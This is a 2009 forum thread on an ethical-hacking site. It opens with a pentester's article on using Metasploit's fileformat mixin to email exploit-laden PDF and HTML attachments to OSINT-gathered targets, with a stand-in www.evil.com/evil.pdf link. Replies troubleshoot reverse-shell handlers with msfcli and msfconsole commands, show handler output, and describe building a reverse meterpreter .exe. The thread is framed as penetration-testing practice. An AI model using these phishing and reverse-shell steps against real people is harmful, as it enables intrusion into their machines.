.

[Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Mon Feb 02, 2009 6:30 pm

[Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

More hacking goodness from Mr. Gates!!

Permanent link: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!


Image


[b]By Chris Gates, CISSP, GCIH, C|EH, CPTS

It should be obvious to everyone that the bad guys are moving away from network level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page.  This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website.  Your mileage may very on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of "normal" or "non-malicious" type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm,  as well as others.[br /]

**This isn't to say that some fileformat exploits can't be delivered via the web.  You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user's inbox. So let's take a quick look at how this can be accomplished.



Don
Last edited by don on Wed Feb 04, 2009 12:38 pm, edited 1 time in total.
CISSP, MCSE, CSTA, Security+ SME
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Feb 02, 2009 9:36 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Great examples and video :)  I was playing with this stuff the other day with the office macros in Metasploit.  It seemed to be quite effective.  It's amazing what folks will click on with a good backstory.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

RoleReversal

User avatar

Hero Member
Hero Member

Posts: 928

Joined: Fri Jan 04, 2008 8:54 am

Location: UK

Post Tue Feb 03, 2009 9:55 am

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Nice work Chris, thanks :D

(looks like the vimeo link has gone walkies though...)
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Feb 03, 2009 3:23 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

Like your other videos as well as this one, I've got to say nice work. It's a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I'd sure like your trunk by the way, 327 Exploits I only have 288 (I think...)
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

LSOChris

Post Tue Feb 03, 2009 3:55 pm

Re: [Article]-Video: Client-Side, Social Engineering and Metasploit, Oh My!

thanks guys!

I'll be releasing a few more client-side/fileformat videos in March as part of my client-side talk at SOURCE Boston, I'll make sure i post on EH.net when i do.
<<

mtgarden

Newbie
Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 12:42 pm

Question: I would like to use this in a demonstration next week

Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Feb 11, 2009 12:59 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

You mean like binding the PDF with an existing PDF? I'm thinking that you can, but what would be the point, once the malicious pdf opens, doesn't it just freeze up anyway?
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

mtgarden

Newbie
Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 1:00 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Not sure.  Was in the process of setting up a test environment to explore this threat vector.
<<

LSOChris

Post Wed Feb 11, 2009 3:10 pm

Re: Question: I would like to use this in a demonstration next week

mtgarden wrote:Is it possible for metasploit to tie this to a current PDF?  In other words, can I use a pdf I have and add this exploit onto it?  At least, where would I start looking for that information?


not currently that i am aware of
Last edited by LSOChris on Thu Feb 12, 2009 10:43 am, edited 1 time in total.
<<

mtgarden

Newbie
Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 3:47 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Thanks. I was testing this for a presentation but Symantec actually catches it.  So, am trying the vbscript attack. 

Sadly, there is a quirk with either Metasploit or BT3.  Not sure which yet.  When I run the /msfcli multi/handler PAYLOAD=<payload> LHOST=<IP> etc..., it runs the exploit and binds to IP=0.0.0.0 which is less than helpful. 

Heh, I guess there was no reason to assume this would be that easy.  ;D
<<

dean

Post Wed Feb 11, 2009 4:08 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

make sure that the IP you're listening on is the one you add as LHOST and is actually active.

for example:

msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > exploit

[*] Handler binding to LHOST 192.168.1.1
[-] Bind failed on 192.168.1.1
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(handler) > exploit

[*] Handler binding to LHOST 10.10.10.15
[*] Started reverse handler
[*] Starting the payload handler...

tested with 3.3-dev
<<

mtgarden

Newbie
Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Wed Feb 11, 2009 4:24 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Well, my VM has an IP of 192.168.1.1.  So I added LHOST=192.168.1.1 to the exploit.

Then when running ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.1 DisableCourtesyShell=True E

It doesn't give me a "bind failed" error, it just binds to 0.0.0.0.

This happens in a BT3 VM and on a BT3 laptop install.  Would I look for the error/problem in BT3 or in Metasploit 3.2?
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Wed Feb 11, 2009 4:55 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Mine also binds to 0.0.0.0 as well but when testing this out. I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit on my msfconsole, it said 0.0.0.0 however once i executed my .exe i recieved my reverse shell.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

mtgarden

Newbie
Newbie

Posts: 14

Joined: Mon Feb 26, 2007 3:22 pm

Post Thu Feb 12, 2009 7:56 am

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

OK.  Then the problem lies in my malicious VB script.  Will have to figure out how to fix that one.

Thanks.
<<

don

User avatar

Administrator
Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Tue Feb 17, 2009 1:28 pm

Re: [Article]-Video: Client-Sides, Social Engineering and Metasploit, Oh My!

Submitted to digg. Click the link below and vote:

http://digg.com/security/Video_Client_S ... loit_Oh_My

Please help spread the word,
Don
CISSP, MCSE, CSTA, Security+ SME
Next

Return to Gates

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software